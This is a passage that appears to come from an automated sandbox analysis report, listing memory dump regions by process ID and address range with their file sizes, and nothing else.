                                                                                                                                                                                                                                                                                                                                                              • memory/1096-186-0x0000000000470000-0x00000000004AA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                232KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1096-184-0x0000000000400000-0x0000000000467000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                412KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1096-188-0x0000000000380000-0x0000000000398000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1096-229-0x0000000002511000-0x0000000002512000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1096-230-0x0000000000130000-0x000000000013A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1096-236-0x0000000002512000-0x0000000002513000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1384-224-0x0000000004150000-0x0000000004166000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                88KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1696-295-0x0000000000AD0000-0x0000000000AD2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1696-306-0x0000000000AD6000-0x0000000000AF5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1696-309-0x0000000000AF5000-0x0000000000AF6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-59-0x000000000BA08000-0x000000000BA09000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-58-0x000000000BBF4000-0x000000000BBF5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-54-0x0000000075601000-0x0000000075603000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-129-0x000000007EF46000-0x000000007EF48000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-67-0x000000000BC01000-0x000000000BC02000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-55-0x0000000004BE6000-0x0000000004BE7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-56-0x0000000004BF1000-0x0000000004BF2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/1704-57-0x0000000004BF1000-0x0000000004BF2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2000-132-0x000007FEFB771000-0x000007FEFB773000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2044-292-0x0000000000400000-0x000000000045C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                368KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2052-254-0x00000000021B0000-0x00000000021B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2116-231-0x0000000000A50000-0x0000000000B51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2116-232-0x00000000008E0000-0x000000000093D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                372KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2200-223-0x0000000000A10000-0x0000000000A12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2204-234-0x0000000001F10000-0x0000000002B5A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                12.3MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2204-226-0x0000000001F10000-0x0000000002B5A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                12.3MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2204-228-0x0000000001F10000-0x0000000002B5A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                12.3MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2228-205-0x0000000000650000-0x00000000006A2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                328KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2228-207-0x0000000000230000-0x00000000002B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                520KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2244-198-0x0000000000610000-0x0000000000680000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                448KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2244-202-0x0000000000230000-0x00000000002D0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                640KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2244-203-0x0000000000400000-0x00000000004A0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                640KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2396-242-0x0000000000590000-0x0000000000591000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2396-225-0x0000000001040000-0x00000000010C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                512KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2412-183-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2428-284-0x00000000025C0000-0x00000000025C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2428-281-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2516-300-0x00000000004E0000-0x00000000004FB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                108KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2516-235-0x0000000000060000-0x00000000000AC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2516-301-0x00000000030E0000-0x00000000031E5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2516-305-0x0000000000500000-0x0000000000520000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2516-238-0x0000000000460000-0x00000000004D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2524-199-0x0000000000580000-0x00000000005D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                328KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2524-204-0x0000000000240000-0x0000000000249000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2524-206-0x0000000000400000-0x0000000000482000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                520KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2532-258-0x0000000004DC1000-0x0000000004DC2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2532-257-0x0000000000250000-0x000000000026A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                104KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2532-261-0x0000000000400000-0x0000000000478000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                480KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2532-260-0x0000000004DC4000-0x0000000004DC5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2532-259-0x0000000004DC2000-0x0000000004DC3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2532-256-0x0000000000340000-0x00000000003B8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                480KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2572-262-0x0000000000A40000-0x0000000000A42000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2572-308-0x0000000000A46000-0x0000000000A65000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2596-200-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2668-196-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                816KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2684-140-0x0000000001CB0000-0x0000000001CB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2800-212-0x0000000000270000-0x0000000000271000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2812-273-0x0000000000250000-0x0000000000270000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2812-280-0x0000000005211000-0x0000000005212000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2812-283-0x0000000005214000-0x0000000005215000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2812-282-0x0000000005212000-0x0000000005213000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2812-272-0x00000000003C0000-0x00000000003FE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                248KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2840-208-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2840-210-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2912-217-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                816KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-150-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-145-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-151-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-152-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-178-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-182-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-148-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-180-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-185-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-147-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                                                                                                                                                              • memory/2948-146-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                                                                                                                                                              • memory/3024-215-0x00000000004A0000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                              • memory/3028-293-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                4KB